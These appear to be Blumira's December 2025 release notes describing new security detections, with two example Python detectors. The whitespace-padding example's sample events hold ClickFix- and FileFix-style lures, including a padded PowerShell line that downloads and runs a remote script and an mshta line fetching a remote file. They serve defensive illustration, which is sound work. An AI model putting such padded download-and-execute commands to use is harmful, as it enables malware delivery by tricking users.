January 12, 2026

    December 2025 Product Releases

    This month’s release expands Blumira’s detection coverage across Microsoft 365, Fortigate, JumpCloud, SentinelOne, Check Point, and Windows environments. New detections highlight suspicious authentication behavior, unauthorized admin activity, and endpoint tampering attempts, such as logins from new countries, password manager exports, and agent uninstall requests. Detection logic for Splashtop and NetSupport Manager has been refined with new indicators and elevated priorities. Platform enhancements include an audit to improve MITRE ATT&CK® tagging accuracy and a bug fix in the Blumira 7-Day Summary report.

    Detection Updates

    Log Type: Check Point Audit
    NEW - Check Point: User Object Change
    Monitors for the creation, deletion, or modification of user objects in Check Point firewalls
    Default state: Enabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local Admin Created
    Detects the creation of new local administrator accounts on Fortigate devices
    Default state: Enabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local Admin Edited
    Monitors for local administrator accounts being renamed or modified on Fortigate devices
    Default state: Disabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local Admin Deleted
    Monitors for the deletion of local administrator accounts on Fortigate devices
    Default state: Disabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local User Created
    Detects the creation of new local user accounts on Fortigate devices
    Default state: Enabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local User Edited
    Monitors for local user accounts being renamed or modified on Fortigate devices
    Default state: Disabled

    Log Type: Fortigate Event
    NEW - Fortigate: Local User Deleted
    Monitors for the deletion of local user accounts on Fortigate devices
    Default state: Disabled

    Log Type: Fortigate Virus
    NEW - Fortigate: Unblocked Infected File
    Triggers when Fortigate’s antivirus engine identifies a malicious file but the associated traffic is not blocked
    Default state: Enabled

    Log Type: JumpCloud Directory
    NEW - JumpCloud: Admin Login Without MFA
    Monitors for successful JumpCloud administrator logins without multi-factor authentication
    Default state: Enabled

    Log Type: JumpCloud Password Manager
    NEW - JumpCloud: Potential Password Manager Export
    Triggers when JumpCloud detects export activity from a password manager, a tactic attackers often use to exfiltrate credentials during an account compromise
    Default state: Enabled

    Log Type: Microsoft 365 and Azure
    NEW - Microsoft 365: User Authentication from New Country
    Identifies login events originating from a country the user has not logged in from within the prior 15 days
    Default state: Enabled

    Log Type: SentinelOne Activities
    NEW - SentinelOne: Agent Uninstall Request
    Monitors for requests to uninstall the SentinelOne agent, which may indicate an early-stage attempt by an attacker to remove the agent from a protected endpoint
    Default state: Enabled

    Log Type: Windows
    NEW - Suspicious Explorer Process with Whitespace Padding
    Identifies Explorer processes on Windows whose command-line arguments contain 12 or more consecutive Unicode whitespace characters, padding commonly seen in ClickFix and FileFix social engineering attacks
    Default state: Enabled

    Log Type: Fortigate
    UPDATE - Fortigate: Successful Admin Login from External IP Address
    Corrected a typo in the detection’s analysis

    Log Type: Windows
    UPDATE - Remote Access Tool: Splashtop
    Updated to include additional known process names

    Log Type: Windows
    UPDATE - Remote Access Tool: NetSupport Manager
    Updated logic for broader coverage, elevated priority to P2 Suspect, and changed the default deploy state to enabled

    Log Type: Windows
    UPDATE - Remote Access Tool: NetSupport Manager From Unusual Location
    - Increased priority to P1 Suspect and changed the default deploy state to enabled
    - Findings for this rule now include the hash field for added context
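
    The "User Authentication from New Country" rule above is described only by its 15-day window. The following is an added example written for this page, not Blumira's detection logic and not Microsoft's API: it runs the same idea over a handful of constructed sign-in records (the field names user, time, country and success are assumptions) and goes slightly beyond the one-line description in two ways a practitioner would want: failed sign-ins are excluded from the baseline so an attacker's own attempts cannot "pre-approve" a country, and the window is rolling, so a country the user has not used for more than 15 days becomes new again, which the sample data shows for alice's return to US on 30 December.

    ```python
    from datetime import datetime, timedelta

    # Constructed sample sign-in records, not real Microsoft 365 or Blumira data.
    # Field names are assumptions for this example; Entra ID sign-in logs carry
    # the same information under their own keys.
    SIGN_INS = [
        {"user": "alice@example.com", "time": "2025-12-01T08:00:00Z", "country": "US", "success": True},
        {"user": "alice@example.com", "time": "2025-12-03T09:15:00Z", "country": "US", "success": True},
        {"user": "alice@example.com", "time": "2025-12-10T22:40:00Z", "country": "NG", "success": False},
        {"user": "alice@example.com", "time": "2025-12-10T22:41:00Z", "country": "NG", "success": True},
        {"user": "alice@example.com", "time": "2025-12-30T11:00:00Z", "country": "US", "success": True},
        {"user": "bob@example.com",   "time": "2025-12-05T07:30:00Z", "country": "DE", "success": True},
        {"user": "bob@example.com",   "time": "2025-12-06T07:30:00Z", "country": "DE", "success": True},
    ]


    def _ts(s):
        return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


    def find_new_country_logins(events, lookback_days=15):
        """Flag successful sign-ins from a country the user has not successfully
        signed in from within the prior lookback window.

        Events are processed in time order, so each sign-in is judged only
        against what came before it. Failed attempts are ignored entirely: they
        neither seed the per-user baseline nor raise a finding."""
        window = timedelta(days=lookback_days)
        history = {}    # user -> [(time, country)] of earlier successful sign-ins
        findings = []
        for ev in sorted(events, key=lambda e: _ts(e["time"])):
            if not ev["success"]:
                continue
            t = _ts(ev["time"])
            prior = history.setdefault(ev["user"], [])
            # Countries seen for this user in [t - window, t): the rolling baseline.
            baseline = sorted({c for pt, c in prior if t - window <= pt < t})
            if ev["country"] not in baseline:
                findings.append({
                    "user": ev["user"],
                    "time": ev["time"],
                    "country": ev["country"],
                    "baseline": baseline,
                    # An empty baseline is a different analyst question ("first
                    # sign-in we have seen") than a genuinely new country.
                    "reason": "new country" if baseline else "no successful sign-ins in prior window",
                })
            prior.append((t, ev["country"]))
        return findings


    if __name__ == "__main__":
        for f in find_new_country_logins(SIGN_INS):
            print(f"{f['time']} {f['user']} from {f['country']} "
                  f"(baseline {f['baseline']}): {f['reason']}")
    ```

    Running it produces four findings: the first sign-in for each user (empty baseline), alice's NG sign-in on 10 December with a baseline of US, and alice's US sign-in on 30 December, which is flagged again because her last US sign-in fell outside the 15-day window. Widening `lookback_days` to 30 removes that last finding, which is the trade-off the window length sets between catching genuinely new countries and re-alerting on infrequent travellers.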

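    The "Suspicious Explorer Process with Whitespace Padding" rule above keys on 12 or more consecutive Unicode whitespace characters. The block below is an added example for this page, not Blumira's rule and not Windows or Sysmon code: it applies that threshold to constructed process-creation events (the parent, image and cmdline field names are assumptions, and scoping to children of explorer.exe is an assumed reading of "Explorer process"). The point it makes that the one-line description does not is why "Unicode" matters: ClickFix and FileFix lures pad with characters such as U+2003 EM SPACE or U+00A0 NO-BREAK SPACE, which a pattern that only counts ASCII spaces would miss; Python's `\s` on `str` input is Unicode-aware, so one pattern covers all of them. The finding also records which code points were used and the command line with the padding collapsed, which is what an analyst needs to see what the victim actually typed.

    ```python
    import re

    # Constructed sample process-creation events, not real Blumira or Windows log
    # data. Field names are assumptions; Sysmon Event ID 1 and Windows 4688 carry
    # the same information under their own names. 198.51.100.0/24 is a
    # documentation range, not a real host.
    EM_SPACE_PAD = "\u2003" * 40    # U+2003 EM SPACE, renders as invisible padding
    NBSP_PAD = "\u00a0" * 20        # U+00A0 NO-BREAK SPACE

    EVENTS = [
        {   # ClickFix-style: payload first, padding, then the decoy "verification" text
            "parent": r"C:\Windows\explorer.exe",
            "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            "cmdline": 'powershell -w hidden -c "iwr http://198.51.100.7/p.ps1 | iex"'
                       + EM_SPACE_PAD + "# I am not a robot - reCAPTCHA Verification",
        },
        {   # Benign: a path with ordinary single spaces
            "parent": r"C:\Windows\explorer.exe",
            "image": r"C:\Windows\System32\cmd.exe",
            "cmdline": r'cmd /c dir "C:\Users\alice\Documents\Q4 Reports"',
        },
        {   # FileFix-style: plain ASCII spaces pushing a fake file path into view
            "parent": r"C:\Windows\explorer.exe",
            "image": r"C:\Windows\System32\mshta.exe",
            "cmdline": "mshta https://198.51.100.7/x.hta" + " " * 15 + r'"C:\Users\alice\report.pdf"',
        },
        {   # Padded, but not an Explorer child: out of scope unless explorer_only=False
            "parent": r"C:\Windows\System32\services.exe",
            "image": r"C:\Windows\System32\svchost.exe",
            "cmdline": "svchost.exe -k netsvcs" + NBSP_PAD,
        },
    ]


    def find_padded_commands(events, min_run=12, explorer_only=True):
        """Return one finding per process whose command line contains a run of at
        least min_run consecutive whitespace characters.

        On str input Python's \\s matches Unicode whitespace (U+00A0, U+2003,
        U+3000, tabs, ...), not only ASCII 0x20. Zero-width characters such as
        U+200B are not whitespace and are deliberately out of scope here."""
        pattern = re.compile(r"\s{%d,}" % min_run)
        findings = []
        for ev in events:
            if explorer_only and not ev["parent"].lower().endswith("\\explorer.exe"):
                continue
            runs = pattern.findall(ev["cmdline"])
            if not runs:
                continue
            longest = max(runs, key=len)
            findings.append({
                "image": ev["image"],
                "run_length": len(longest),
                "codepoints": sorted({f"U+{ord(c):04X}" for c in longest}),
                # The command line with the padding collapsed: what was really run.
                "collapsed": pattern.sub(" ", ev["cmdline"]),
            })
        return findings


    if __name__ == "__main__":
        for f in find_padded_commands(EVENTS):
            print(f"{f['image']}: run of {f['run_length']} {f['codepoints']}")
            print("   ", f["collapsed"])
    ```

    With the default scope the example flags the powershell.exe and mshta.exe launches and ignores the benign cmd.exe line; passing `explorer_only=False` also surfaces the NBSP-padded svchost.exe line, which shows the threshold is independent of the parent-process filter. In a real pipeline the parent filter is what keeps this rule quiet, since long whitespace runs do turn up in legitimately generated command lines elsewhere.
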
    Bug Fixes and Improvements

    Bug Fixes 

    • Blumira 7-Day Summary: Grouped Log Counts by Type: The global report now correctly includes all log types and will dynamically update with newly added sources as integrations are introduced over time. Previously, it was static and limited to a manually defined set of log sources, which led to the report missing some log types.

    Improvements 

    • MITRE ATT&CK® Tagging: We conducted a full audit and refinement of the MITRE ATT&CK® techniques we have tagged across our existing detection rules to improve accuracy of those tags.

    November 2025 Release Notes

    In case you missed the November updates, you can find and review those notes here.

    Eric Pitt

    Eric is a Product Marketing Manager at Blumira focusing on customer research and positioning to continuously improve the Blumira platform.
